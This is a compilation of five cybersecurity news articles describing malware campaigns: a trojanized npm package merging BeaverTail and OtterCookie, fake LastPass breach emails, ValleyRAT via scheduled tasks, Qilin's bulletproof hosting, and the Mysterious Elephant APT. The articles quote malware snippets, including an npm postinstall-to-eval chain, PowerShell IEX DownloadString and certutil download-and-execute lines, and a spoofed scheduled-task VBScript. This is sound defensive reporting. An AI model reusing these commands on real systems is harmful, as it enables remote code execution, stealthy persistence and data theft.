A new information-stealer has emerged targeting job seekers with a trojanized Node.js application named Chessfi.

Delivered via a modified npm package hosted on the official repository, the malware blends two previously separate tools—BeaverTail and OtterCookie—into a unified JavaScript payload.

Victims are lured through fake employment offers and asked to install the application under the guise of a coding assessment, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and user activity.

Cisco Talos analysts identified the campaign when investigating unusual outbound traffic from a compromised system.

They found that a post‐installation script in the node-nvm-ssh package spawns a hidden child process that deobfuscates and evaluates a large JavaScript payload.

This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s remote shell, file exfiltration, clipboard and now keylogging modules.

Once executed, the combined malware establishes a connection to a command-and-control server over socket.io.

The attacker can remotely issue commands, steal files matching a wide range of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell commands.

Meanwhile, the keylogging component captures every keystroke and takes periodic desktop screenshots before uploading them to the C2 server along with clipboard contents.

Sustained network activity

Infected systems show sustained network activity on high-numbered TCP ports, often 1418 for socket.io and 1478 for keylog uploads.

The malware creates a temporary folder named windows-cache and writes keystrokes to 1.tmp every second, while screenshots are saved as 2.jpeg every four seconds.

Using the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key events and schedules screenshot captures, then bundles and sends the data to hxxp://172.86.88.188:1478/upload.

In addition to credential theft and remote shell access, the campaign’s infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package.json executes the skip script:

"scripts": {
  "postinstall": "npm run test npm run transpile npm run skip"
}

The skip command invokes node testfixtures/eval, which by default loads index.js. That script spawns a detached child process running file15.js:

const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });

Finally, file15.js reads and evaluates the content of test.list using eval, revealing the combined BeaverTail and OtterCookie modules:

const fs = require('fs');
const path = require('path');
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });

This convoluted chain—cloning a Git repository, running benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the sophisticated infection mechanism.

By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Famous Chollima has crafted a versatile malware that leverages familiar developer workflows to compromise unsuspecting victims.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging appeared first on Cyber Security News.

Cybersecurity professionals are raising alarms over a new wave of phishing emails masquerading as breach notifications from LastPass.

These messages warn recipients of an urgent account compromise and urge them to download a “security patch” to restore access.

In reality, the downloadable file contains a sophisticated malware loader designed to harvest credentials and deploy additional payloads.

The scheme has been active since early October and has already ensnared several enterprise users.

The emails leverage familiar LastPass branding, complete with company logos and links that appear to direct victims to legitimate domains.

However, closer inspection reveals subtle URL manipulations that redirect users to attacker-controlled servers hosting malicious executables.

LastPass analysts identified the campaign after observing multiple users reporting unexpected login failures and anomalous network traffic shortly after clicking the links.

Each phishing email attaches a ZIP archive named “LastPass_Security_Update.zip” containing an executable disguised as an MSI installer.

When launched, the MSI drops a PowerShell script in the user’s AppData folder and executes it via a scheduled task.

This script reaches out to a remote command-and-control server to download a second-stage payload, which is capable of keylogging, screenshot capture, and lateral movement within corporate networks.

Infection Mechanism

The core of the attack revolves around a crafted PowerShell command that downloads and executes the loader without writing the script to disk. A snippet of the obfuscated command is shown below:-

IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')

This one-liner uses IEX to execute the downloaded content directly in memory, evading most antivirus solutions.

The loader then injects a DLL into svchost.exe to maintain persistence and bypass application whitelisting.

This campaign underscores the importance of verifying email authenticity, employing multi-factor authentication, and monitoring for unusual PowerShell activity in enterprise environments.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Beware of Fake ‘LastPass Hack’ Emails Trying to Trick Users Into Installing Malware appeared first on Cyber Security News.

Over the past month, a targeted campaign dubbed Operation Silk Lure has surfaced, exploiting the Windows Task Scheduler to deploy a novel variant of ValleyRAT.

Emerging in mid-2025, the operation hinges on spear-phishing emails that carry malicious LNK attachments masquerading as candidate resumes.

When victims open these attachments, a hidden PowerShell command initiates the download of a decoy document and two executables: a loader (keytool.exe) and its side-loaded DLL (jli.dll).

Initial analysis reveals that the phishing lure is crafted for Chinese fintech and trading firms’ HR departments.

The malicious LNK file contains an obfuscated PowerShell one-liner, which silently retrieves payloads from a command-and-control (C2) server hosted in the United States.

Once executed, the dropper writes a VBScript named CreateHiddenTask.vbs into the user’s AppData folder, then runs it to establish persistence.

Seqrite researchers noted that this script programmatically registers a daily scheduled task named “Security,” spoofing Microsoft Corporation as the author, and immediately deletes itself to hinder detection.

Following the persistence step, the loader binary (keytool.exe) launches and uses DLL side-loading to execute jli.dll.

This DLL locates an 8-byte marker in its own file, extracts the subsequent encrypted payload, and performs RC4 decryption with a hard-coded key.

The decrypted shellcode is injected directly into memory, establishing contact with the C2 server at 206.119.175.16 and beginning reconnaissance and exfiltration.

Seqrite researchers noted that once inside, ValleyRAT engages in extensive data harvesting and defense-evasion maneuvers.

It fingerprints the host—collecting CPU details, screen resolution, and NIC information—while checking for virtualization or known antivirus products via WMI queries.

Detected security services, including 360Safe and Kingsoft, have their network connections forcefully terminated. All activities are logged and transmitted covertly over HTTPS, raising the risk of credential theft and corporate espionage.

Infection Mechanism and Persistence

A closer look at the infection chain uncovers the elegance of its persistence tactic. The VBScript used to register the scheduled task leverages COM interfaces to interact with the Task Scheduler.

Below is the core snippet from CreateHiddenTask.vbs:-

Set service = CreateObject("Schedule.Service")
service. Connect
Set rootFolder = service.GetFolder("\")
Set taskDef = service.NewTask(0)
With taskDef.RegistrationInfo
    .Author = "Microsoft Corporation"
End With
With taskDef.Triggers.Create(1)  ' DAILY trigger
    .StartBoundary = "2025-08-01T08:00:01"
    .DaysInterval = 1
End With
With taskDef.Actions.Create(0)   ' EXEC action
    .Path = ExpandEnvironmentStrings("%APPDATA%\keytool.exe")
End With
rootFolder.RegisterTaskDefinition "Security", taskDef, 6, "", "", 3

Upon registration, the task executes keytool.exe every morning at 8:00 AM. This mechanism ensures the loader runs consistently, even after system reboots.

By embedding author metadata and deleting the script, the threat actors blend into normal system activity, complicating forensic investigations.

The combination of LNK-based initial compromise, VBScript persistence, and DLL side-loading makes Operation Silk Lure a sophisticated threat demanding updated hunting signatures and vigilant monitoring of scheduled tasks.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Operation Silk Lure Weaponizing Windows Scheduled Tasks to Drop ValleyRAT appeared first on Cyber Security News.

The Qilin ransomware group has emerged as one of the most prolific and dangerous threat actors in the cybersecurity landscape, exploiting sophisticated bulletproof hosting infrastructure to conduct devastating attacks on organizations across multiple sectors.

Operating under a Ransomware-as-a-Service (RaaS) model, Qilin first surfaced in mid-2022 under the name “Agenda” before rebranding later that year.

The group has gained widespread notoriety for targeting healthcare organizations, government entities, critical infrastructure operators, and asset management firms worldwide.

Most notably, the gang recently claimed responsibility for the September 2025 ransomware attack that crippled operations at Asahi Group Holdings, Japan’s largest beverage manufacturer, forcing production shutdowns at most of its 30 factories for nearly two weeks.

The ransomware operation maintains variants written in both Golang and Rust programming languages, demonstrating technical versatility that enables cross-platform attacks.

According to the Health Sector Cybersecurity Coordination Center, Qilin gains initial access through spear phishing campaigns and leverages Remote Monitoring and Management (RMM) tools alongside other common penetration tools to establish persistence within compromised networks.

The group practices double extortion tactics, encrypting victim data while simultaneously exfiltrating sensitive information to pressure organizations into paying ransoms.

Their RaaS platform provides affiliates with user-friendly panels to configure attacks, manage victims, and negotiate ransoms, while maintaining a Data Leak Site on the Tor network for publishing stolen data.

Resecurity analysts noted that Qilin’s operations are deeply intertwined with an underground bulletproof hosting conglomerate that has origins in Russian-speaking cybercriminal forums and Hong Kong.

The threat actors have established strong connections to rogue hosting providers that enable them to operate with minimal oversight and maximum resilience against law enforcement intervention.

These bulletproof hosting services are incorporated in pro-secrecy jurisdictions and structured across complex webs of anonymous shell companies distributed geographically, creating safe havens for cybercriminals who wish to remain anonymous.

The group’s infrastructure relies heavily on providers such as Cat Technologies Co. Limited, a Hong Kong-based entity that shares business addresses with related companies including Starcrecium Limited in Cyprus and Chang Way Technologies Co. Limited.

Resecurity researchers identified that these entities serve as official representatives for Russia-based hosting provider Hostway.ru, which operates under the legal entity OOO “Information Technologies”.

Network analysis revealed that Qilin ransomware operations utilize IP addresses associated with these providers, with frequent changes to complicate tracking efforts.

In April 2024, researchers observed the group’s Data Leak Site mentioning IP addresses 176[.]113[.]115[.]97 and 176[.]113[.]115[.]209, both associated with Cat Technologies Co. Limited.

The business model of these bulletproof hosting providers thrives on zero Know Your Customer (KYC) protocols and complete absence of due-diligence checks.

They offer services ranging from $95 to $500 and beyond, depending on server configurations, with specialized offerings for mass scanning capabilities featuring network bandwidth up to 10 Gbps. One prominent provider, BEARHOST Servers—also known as Underground and Voodoo Servers—has been advertising directly on Qilin’s “WikiLeaksV2” platform.

Historical passive DNS records show this operation was hosted at IP 31[.]41[.]244[.]100 associated with Red Bytes LLC in Saint Petersburg, Russia.

The service has maintained active accounts on multiple underground forums including XSS and Exploit since at least 2019.

Bulletproof Hosting Infrastructure and Operational Resilience

The bulletproof hosting infrastructure supporting Qilin ransomware operations demonstrates remarkable resilience through sophisticated corporate structures designed to evade detection and law enforcement action.

Multiple legal entities share common directors and addresses, creating a complex web that shields the true operators from accountability.

Corporate records reveal that Mr. Lenar Davletshin serves as director of numerous entities including Chang Way Technologies Co. Limited, Starcrecium Limited, OOO “Red Byte,” OOO “Information Technologies,” OOO “Hostway,” OOO “Hostway Rus,” OOO “Triostars,” and OOO “F1″—all registered in Russia, Cyprus, and Hong Kong.

These hosting networks are frequently implicated in command-and-control server operations for various malware families including Amadey, StealC, and CobaltStrike.

The IP address 85.209.11.79, associated with this infrastructure, has been reported over 11,346 times to AbuseIPDB for malicious activity including exploit probing and network scanning.

The interconnected nature of these providers was further confirmed when U.S. Treasury Department sanctions in July 2025 targeted the Aeza Group for providing bulletproof hosting services to cybercriminals, specifically aiding ransomware groups like BianLian and hosting illicit drug markets such as BlackSprut.

Following increased scrutiny and multiple abuse complaints, BEARHOST announced in late December 2024 that their service would transition to private mode, accepting new customers only through vetting and invitations from existing clients.

This operational security adjustment represents a common pattern among established underground vendors who have built significant customer bases and seek to minimize exposure to law enforcement and cybersecurity researchers.

In May 2025, BEARHOST rebranded as “voodoo_servers” before ultimately announcing termination of services due to “political reasons,” executing what appears to be an exit scam that left customers without server access or fund returns while the underlying legal entities continued operations.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Qilin Ransomware Using Ghost Bulletproof Hosting to Attack Organizations Worldwide appeared first on Cyber Security News.

In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.

First identified by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.

Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign exhibits a significant evolution in both delivery mechanisms and post-exploitation tooling.

Initial incursions leveraged spear-phishing emails embedding malicious Office documents exploiting CVE-2017-11882.

Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor’s modular framework.

As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.

Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.

These components encode stolen data with XOR-based obfuscation before transmitting it via HTTP to wildcard DNS domains such as storycentral.net and monsoonconference.com.

By leveraging legitimate domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.

# Download and execute BabShell payload
certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
rundll32.exe BabShell.dll,EntryPoint

Infection Mechanism

The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.

When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.

This PowerShell instance operates in hidden mode (-nop -w hidden) and uses .NET’s WebClient class to fetch the BabShell DLL loader.

Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.

After initial beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it into a system service process.

This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.

By avoiding disk writes, MemLoader HidenDesk significantly diminishes kinetic evidence, allowing Mysterious Elephant to navigate laterally and harvest target data undetected.

The group’s use of open-source codebases, combined with proprietary modifications, underscores both resourcefulness and technical sophistication.

Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information appeared first on Cyber Security News.